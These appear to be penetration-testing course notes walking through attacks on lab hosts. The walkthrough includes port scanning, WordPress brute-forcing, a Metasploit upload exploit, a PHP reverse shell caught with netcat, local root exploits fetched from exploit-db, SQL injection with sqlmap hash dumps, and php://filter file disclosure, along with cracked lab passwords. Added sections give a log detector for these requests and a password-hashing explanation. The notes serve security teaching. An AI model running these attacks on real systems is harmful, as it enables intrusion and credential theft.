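nmap_csv_with_versions() {
    grep -v ',""$'
}

# Constructed excerpt in nmap's normal output format.
sample_scan() {
    cat <<'EOF'
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
9999/tcp open  abyss?
Service Info: OS: Windows

Nmap scan report for minotaur (172.31.2.117)
Host is up (0.086s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2020/tcp open  ftp     vsftpd 2.0.8 or later
161/udp  open|filtered snmp
EOF
}

sample_scan | nmap_to_csv
sample_scan | nmap_to_csv | nmap_csv_with_versions
```

For anything beyond a one-off, nmap's own -oX or -oG output is the more stable format to parse; this awk version exists because the notes keep normal output in files, and that is what you will have on disk.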
3101
3102
3103
3104
3105
3106
3107
3108-----------------------------------------------------------------------------------------------------------------------------
3109-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3110-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3111--------------------------------------------------------------------------------------
3112
3113#!/bin/bash
3114
3115# Script made during the CyberWar class for the students to play with, debug, and improve.
3116# Take a look at the following websites for ideas:
3117# https://github.com/commonexploits/port-scan-automation
3118# https://www.commonexploits.com/penetration-testing-scripts/
3119# https://github.com/averagesecurityguy/scripts
3120# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3121
3122
3123
3124# Some thoughts of things to add to this script:
3125# Shodan queries (API key)
3126# AWS scanning (need credentials)
3127# Jenkins scanning
3128# Active Directory enumeration
3129# Github scanning (API key required)
3130# Blockchain platforms
3131
3132
3133
3134
3135
3136
3137
3138#############################################
3139# Check to see if script is running as root #
3140#############################################
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
  exit 1
fi
3145
3146
3147####################################
3148# Check to see if gcc is installed #
3149####################################
file1="/usr/bin/gcc"
if [ -f "$file1" ]
then
    echo "$file1 is installed."
    clear
else
    echo "$file1 not found."
    echo Installing gcc
    apt-get install -y gcc
    clear
fi
3161
3162########################
3163# Make the directories #
3164########################
3165cd /tmp
3166rm -rf customerAudit/
3167rm -rf NetworkAudit/
3168mkdir -p /tmp/NetworkAudit/discovered_services/
3169mkdir -p /tmp/NetworkAudit/scan/windows/
3170mkdir -p /tmp/NetworkAudit/scan/sunrpc/
3171mkdir -p /tmp/NetworkAudit/scan/ssh/
3172mkdir -p /tmp/NetworkAudit/scan/ftp/
3173mkdir -p /tmp/NetworkAudit/scan/http/
3174mkdir -p /tmp/NetworkAudit/scan/telnet/
3175mkdir -p /tmp/NetworkAudit/scan/pop3/
3176mkdir -p /tmp/NetworkAudit/scan/printers/
3177mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
3178mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
3179mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
3180mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
3181
3182
3183#####################
3184# Download propecia #
3185#####################
file2="/bin/propecia"
if [ -f "$file2" ]
then
    echo "$file2 is installed."
    clear
else
    echo "$file2 not found."
    echo Installing propecia
    cd /tmp
    wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
    gcc propecia.c -o propecia && cp propecia /bin
fi
3199
3200######################
3201# Find Windows Hosts #
3202######################
3203clear
3204echo "Scanning for windows hosts."
3205propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
3206clear
3207echo "Done scanning for windows hosts. FTP is next."
3208
3209
3210##################
3211# Find FTP Hosts #
3212##################
3213echo "Scanning for hosts running FTP."
3214propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
3215clear
3216echo "Done scanning for FTP hosts. SSH is next."
3217
3218##################
3219# Find SSH Hosts #
3220##################
3221echo "Scanning for hosts running SSH."
3222propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
3223clear
3224echo "Done scanning for SSH hosts. POP3 is next."
3225
3226
3227###################
3228# Find POP3 Hosts #
3229###################
3230echo "Scanning for hosts running POP3."
3231propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
3232clear
3233echo "Done scanning for POP3 hosts. SunRPC is next."
3234
3235
3236#####################
3237# Find SunRPC Hosts #
3238#####################
3239echo "Scanning for hosts running SunRPC."
3240propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
3241clear
3242echo "Done scanning for SunRPC hosts. Telnet is next."
3243
3244
3245#####################
3246# Find Telnet Hosts #
3247#####################
3248echo "Scanning for hosts running Telnet."
3249propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
3250clear
3251echo "Done scanning for Telnet hosts. HTTP is next."
3252
3253
3254###################
3255# Find HTTP Hosts #
3256###################
3257echo "Scanning for hosts running HTTP"
3258propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
3259clear
3260echo "Done scanning for HTTP hosts. HTTPS hosts are next."
3261
3262
####################
# Find HTTPS Hosts #
####################
echo "Scanning for hosts running HTTPS"
propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
clear
echo "Done scanning for HTTPS hosts. Databases are next."
3270
3271
3272##################
3273# Find Databases #
3274##################
3275echo "Scanning for hosts running MS SQL Server"
3276propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
3277clear
3278
3279echo "Scanning for hosts running Oracle"
3280propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
3281clear
3282
3283echo "Scanning for hosts running Postgres"
3284propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
3285clear
3286
3287echo "Scanning for hosts running MongoDB"
3288propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
3289clear
3290
3291echo "Scanning for hosts running MySQL"
3292propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
3293clear
3294echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
3295
3296
3297###############################
3298# Ok, let's do the NMAP files #
3299###############################
3300clear
3301# Windows
3302for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
3303echo "Done with Windows."
3304
3305clear
3306# FTP
3307for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
3308echo "Done with FTP."
3309
3310clear
3311# SSH
3312for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
3313echo "Done with SSH."
3314
3315clear
3316# SUNRPC
3317for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
3318echo "Done with SunRPC."
3319
3320clear
3321# POP3
for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script='banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg' $x > /tmp/NetworkAudit/scan/pop3/$x ; done
3323echo "Done with POP3."
3324
3325# clear
3326# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3327# as a good reference for what nmap nse scripts to run against port 80 and 443
3328# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3329# echo "Done with HTTP."
3330
3331
3332# clear
3333# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3334# as a good reference for what nmap nse scripts to run against port 80 and 443
3335# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3336# echo "Done with HTTP."
3337
3338
3339clear
3340# SQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
3342echo "Done with MS SQL."
3343
3344clear
3345# Oracle Servers
3346# FIX THIS: needs brute force wordlists for this to run correctly
3347# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
3348# echo "Done with Oracle."
3349
3350clear
3351# MongoDB
3352for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
3353echo "Done with MongoDB."
3354
3355
3356clear
3357# MySQL Servers
3358for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
3359echo "Done with MySQL."
3360
3361
3362# Add postgres nse scripts
3363# References:
3364# https://nmap.org/nsedoc/lib/pgsql.html
3365# https://nmap.org/nsedoc/scripts/pgsql-brute.html
3366#
3367
3368echo " "
3369echo " "
3370sleep 1
3371clear
3372echo "Done, now check your results."
3373sleep 2
3374clear
3375cd /tmp/NetworkAudit/scan/
3376ls
3377
3378
3379
3380----------------------------------------------------------------------------------------------------------------------------
3381-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3382-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3383--------------------------------------------------------------------------------------
3384
#####################################
# Day 2: Attacking Hosts in the lab #
#####################################
3388
3389######################
3390# Attacking Minotaur #
3391######################
3392
3393Step 1: Portscan/Bannergrab the target host
3394---------------------------Type This-----------------------------------
3395sudo nmap -sV 172.31.2.117
3396-----------------------------------------------------------------------
3397
3398
3399
3400Step 2: Vulnerability scan the web server
3401---------------------------Type This-----------------------------------
3402cd /home/hacklab/toolz/Nikto2/program
3403perl nikto.pl -h 172.31.2.117
3404-----------------------------------------------------------------------
3405
3406
3407
3408Step 3: Directory brute-force the webserver
3409---------------------------Type This-----------------------------------
3410cd /home/hacklab/toolz/dirb
3411./dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
3412-----------------------------------------------------------------------
3413
3414### dirb output ###
3415==> DIRECTORY: http://172.31.2.117/bull/
3416-----------------------------------------------------------------------
3417
3418
3419Step 4: Run wordpress vulnerability scanner
3420---------------------------Type This-----------------------------------
3421wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
3422
3423
3424cewl -w words.txt http://172.31.2.117/bull/
3425
3426
3427cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
3428
3429wc -l whateverbro.txt
3430
3431john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
3432
3433wc -l words-john.txt
3434
3435wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
3436-----------------------------------------------------------------------
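Added example, not from the original lab material: the wordlist stage above (cewl -m 6, then john --rules --stdout) built from shell tools, so you can see what each step contributes before the list goes to wpscan. It assumes a saved copy of the target page rather than crawling it; the HTML and the suffix list inside it are constructed for the example.

```bash
#!/bin/bash
# Added example (not from the original notes): the cewl + john --rules
# wordlist stage done with shell tools. Real usage:
#   curl -s http://172.31.2.117/bull/ > bull.html
#   page_words 6 < bull.html | mangle_words > words-john.txt
# The HTML below is constructed; it is not the lab's WordPress site.

# Strip scripts and tags, split on non-letters, keep words of at least
# $1 characters, unique and case-preserved (like "cewl -m N").
# The sed only handles tags that open and close on one line, which is
# good enough for wordlist building.
page_words() {
    local minlen=$1
    sed -e 's/<script[^>]*>.*<\/script>//g' -e 's/<[^>]*>/ /g' \
        | tr -cs 'A-Za-z' '\n' \
        | awk -v m="$minlen" 'length($0) >= m && !seen[$0]++'
}

# A small slice of what "john --rules" does: three case variants of each
# word plus the suffixes people really append. The suffix list (1, 123, !,
# and a few years) is an assumption chosen for the example. Output is unique.
mangle_words() {
    awk '
        {
            w = $0
            lower = tolower(w)
            upper = toupper(w)
            cap = toupper(substr(w, 1, 1)) tolower(substr(w, 2))
            n = split(lower " " upper " " cap, base, " ")
            for (i = 1; i <= n; i++) {
                out(base[i])
                out(base[i] "1"); out(base[i] "123"); out(base[i] "!")
                out(base[i] "2018"); out(base[i] "2019"); out(base[i] "2020")
            }
        }
        function out(s) { if (!seen[s]++) print s }'
}

# Constructed page content.
sample_page() {
    cat <<'EOF'
<html><head><title>Bull Blog</title>
<script>var x = "ignored";</script></head>
<body><h1>Bighorned Bulls</h1>
<p>Welcome to the blog of bully, the strongest Bighorned bull in Montana.</p>
</body></html>
EOF
}

sample_page | page_words 6
sample_page | page_words 6 | mangle_words | wc -l
```

Compare the two counts the way the notes do with wc -l: four base words become 84 candidates here, which is the whole point of the rules stage, and also why a 10-thread wpscan run against a cewl list of a few thousand words takes a while.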
3437
3438
3439
3440
3441
3442Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
3443---------------------------Type This-----------------------------------
3444msfconsole
3445
3446use exploit/unix/webapp/wp_slideshowgallery_upload
3447
3448set RHOST 172.31.2.117
3449
3450set RPORT 80
3451
3452set TARGETURI /bull
3453
3454set WP_USER bully
3455
3456set WP_PASSWORD Bighornedbulls
3457
3458exploit
3459-----------------------------------------------------------------------
3460
3461Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
3462This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
3463and then from the lab network attacking other students.
3464
3465
3466---------------------------Type This-----------------------------------
3467wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
3468
3469tar -zxvf php-reverse-shell-1.0.tar.gz
3470
3471cd ~/toolz/php-reverse-shell-1.0/
3472
3473nano php-reverse-shell.php
3474-----------------------------------------------------------------------
3475 ***** change the $ip and $port variables to a host that you have already compromised in the network
3476 ***** for this example I chose 172.31.2.64 and kept port 1234
3477
3478
3479---------------------------Type This-----------------------------------
3480chmod 777 php-reverse-shell.php
3481cp php-reverse-shell.php ..
3482-----------------------------------------------------------------------
3483
3484
3485
3486Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
3487Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
3488--------------------------Type This-----------------------------------
3489python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
3490
3491-----------------------------------------------------------------------
3492
3493
3494
3495Set up netcat listener on previously compromised host
3496---------------------------Type This-----------------------------------
3497ssh -l webmin 172.31.2.64
3498 webmin1980
3499
3500
3501nc -lvp 1234
3502-----------------------------------------------------------------------
3503
3504
3505
3506
3507---------------------Type This in your browser ------------------------
http://172.31.2.117/bull/wp-content/uploads/slideshow-gallery/php-reverse-shell.php
3509-----------------------------------------------------------------------
3510
3511
3512Now check your listener to see if you got the connection
3513---------------------------Type This-----------------------------------
3514id
3515
3516/sbin/ifconfig
3517
3518python -c 'import pty;pty.spawn("/bin/bash")'
3519
3520---------------------------Type This-----------------------------------
3521cd /tmp
3522cat >> exploit2.c << out
3523-----------------------------------------------------------------------
3524**************paste in the content from here *****************
3525https://www.exploit-db.com/raw/37292/
3526
3527**************hit enter a few times *****************
3528
3529---------------------------Type This-----------------------------------
3530out
3531
3532
3533gcc -o boom2 exploit2.c
3534
3535./boom2
3536
3537id
3538-----------------------------------------------------------------------




---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.181
-----------------------------------------------------------------------
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)


---------------------------Type This-----------------------------------
sudo nmap -sU -p69,161 172.31.2.181
-----------------------------------------------------------------------
PORT    STATE  SERVICE
69/udp  closed tftp
161/udp open   snmp


---------------------------Type This-----------------------------------
sudo apt-get -y install onesixtyone snmp

wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt

onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
----------------------------------------------------------------------
This gives the error "Community string too long". A little bit of Google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1

---------------------------Type This-----------------------------------
cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt

onesixtyone -c snmp-community-strings.txt 172.31.2.181

snmpwalk -Os -c public -v 1 172.31.2.181
---------------------------------------------------------------------

Username "eric" found in the snmpwalk output, along with the string "There is a house in New Orleans they call it..."

Google the sentence, and I find out that the whole sentence is "There is a house in New Orleans they call it the rising sun".

Try to SSH to the box using the credentials eric:therisingsun

---------------------------Type This-----------------------------------
ssh -l eric 172.31.2.181
 therisingsun

id
cat /etc/issue
uname -a
cat /etc/*release

---------------------------Type This-----------------------------------
cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom

id


......YEAH - do the happy dance!!!!



How to go after 172.31.2.238
Reference: https://t0w3ntum.com/2017/01/07/baffle/


---------------------------------------------------------------
sudo nmap -sV -p 3260 172.31.2.217


sudo apt install open-iscsi

sudo iscsiadm -m discovery -t st -p 172.31.2.217

sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login

sudo /bin/bash

fdisk -l
 ***** look for /dev/sda5 - Linux swap / Solaris *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

ls

cd /media/bobsdisk/

ls

cat ToAlice.eml
 ***** look for supercalifragilisticoespialidoso ******

cat ToAlice.eml | grep flag

file ToAlice.csv.enc

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 supercalifragilisticoespialidoso

ls

cat ToAlice.csv

-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------

The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
 -- view source

Found a long base64-encoded string in the page source.

------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----


http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
 -- view source --
 -- Nothing in source --

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
 -- view source --
 -- Nothing in source --


Tried the php://filter base64-encode wrapper on the ?p= parameter to read the PHP source of the included files:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------
Use the string found here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------
-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>





============================================ Attacking another server because I need a reverse shell =========================================
---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:
-------------



Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------



- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238



Step 2: Port scan target system
-------------------------------


---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------



-------------Scan Results--------------------------------------------
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
514/tcp  filtered shell
1037/tcp filtered ams
6667/tcp open     irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
 or with dirbuster (dirb)

---------------------------Type This-----------------------------------
git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------



3875
3876Step 5: Browse the web site to look for clues
3877---------------------------------------------
3878Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
3879
3880
3881..... really didn't get much from here so we just opened the web page in a browser
3882http://172.31.2.64/
3883
3884.....browsed to the webpage and saw that it pointed to:
3885http://172.31.2.64/jabc
3886
3887....clicked on documentation link and found hidden text that pointed to here:
3888http://172.31.2.64/jabcd0cs/
3889
3890....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
3891https://www.exploit-db.com/exploits/32075/
3892
3893Tried the sql injection described in exploit-db:
3894http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
3895
3896http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
3897
3898
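As an added example (not part of the original notes), here is a small Python detector that flags, in Apache combined-format access logs, the three request patterns used against the web servers in this walkthrough: the UNION SELECT through add_value, the php://filter read of flag.php, and the request that executes a .php file under wp-content/uploads. The log lines are constructed to mirror those requests; the client IPs, timestamps and the three regex rules are this example's assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real captures) modelled on the
# requests made in this walkthrough: the UNION SELECT against ajax_udf.php, the
# php://filter read of flag.php and the request that executes the uploaded shell.
SAMPLE_LOG = """\
172.31.2.10 - - [16/Mar/2020:16:44:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.31.2.10 - - [16/Mar/2020:16:45:12 +0000] "GET /c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
172.31.2.10 - - [16/Mar/2020:16:46:30 +0000] "GET /bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.31.2.11 - - [16/Mar/2020:16:47:05 +0000] "GET /jabcd0cs/index.php?q=1 HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
"""

# Client, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (name, predicate over the percent-decoded request target).
RULES = [
    # UNION-based injection such as the add_value payload above
    ("sqli-union", lambda t: re.search(r"\bunion\b.*\bselect\b", t, re.I) is not None),
    # php://filter wrapper in a parameter: source disclosure through an include
    ("php-filter-lfi", lambda t: "php://filter/" in t.lower()),
    # a .php file served from the WordPress uploads tree: uploaded web shell
    ("php-in-uploads", lambda t: re.search(r"/wp-content/uploads/.*\.php(\?|$)", t, re.I) is not None),
]


def detect(log_text):
    """Return one (client_ip, rule_name, decoded_target) tuple per matching request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line; skip rather than crash on junk
        target = unquote_plus(m.group("target"))  # decode %20 etc. before matching
        for name, pred in RULES:
            if pred(target):
                hits.append((m.group("ip"), name, target))
    return hits


if __name__ == "__main__":
    for ip, rule, target in detect(SAMPLE_LOG):
        print(f"{ip}  {rule:16} {target}")
```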

Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------



FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net



---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

 username: webmin
 hash: b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

 hash: b78aae356709f8c31118ea613980954b
 pass: webmin1980

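Added example, not from the original notes: why the two hashes recovered above fell to a lookup site instantly, and the salted, slow form that would not. CANDIDATES is a constructed wordlist; treating the 40-hex value as a MySQL native password hash (SHA1 of SHA1, shown by MySQL with a leading '*') and the PBKDF2 parameters are this example's assumptions.

```python
import hashlib
import os

# Values as recovered in the notes above. CANDIDATES is a constructed stand-in
# for the wordlist a cracking tool or lookup site would try; the leading '*'
# is MySQL's display form for the 40-hex native hash (assumption about the dump).
MYSQL_HASH = "*9CFBBC772F3F6C106020035386DA5BBBF1249A11"  # drupal7 MySQL account
ODM_MD5 = "b78aae356709f8c31118ea613980954b"  # webmin row in odm_user
CANDIDATES = ["password", "root", "toor", "webmin", "webmin1980", "drupal7"]


def mysql_native_hash(password):
    """MySQL 4.1+ native hash: '*' + hex(SHA1(SHA1(password))), upper-case.
    No salt and two cheap SHA1 calls, so every guess costs microseconds."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def md5_hex(password):
    """Raw unsalted MD5 as stored in odm_user: same weakness, one hash per guess."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup(target, candidates):
    """Return the candidate whose unsalted hash equals target, or None.
    MySQL native hashes are recognised by the leading '*'; anything else is MD5."""
    t = target.strip()
    for pw in candidates:
        if t.startswith("*"):
            if mysql_native_hash(pw) == t.upper():
                return pw
        elif md5_hex(pw) == t.lower():
            return pw
    return None


def salted_slow_hash(password, salt=None, rounds=200_000):
    """Mitigation: per-user random salt plus a slow KDF (PBKDF2-HMAC-SHA256 here).
    Equal passwords no longer share a digest, so precomputed tables are useless,
    and each guess costs `rounds` HMAC evaluations instead of one SHA1 or MD5."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


if __name__ == "__main__":
    print("MySQL hash ->", lookup(MYSQL_HASH, CANDIDATES))  # toor
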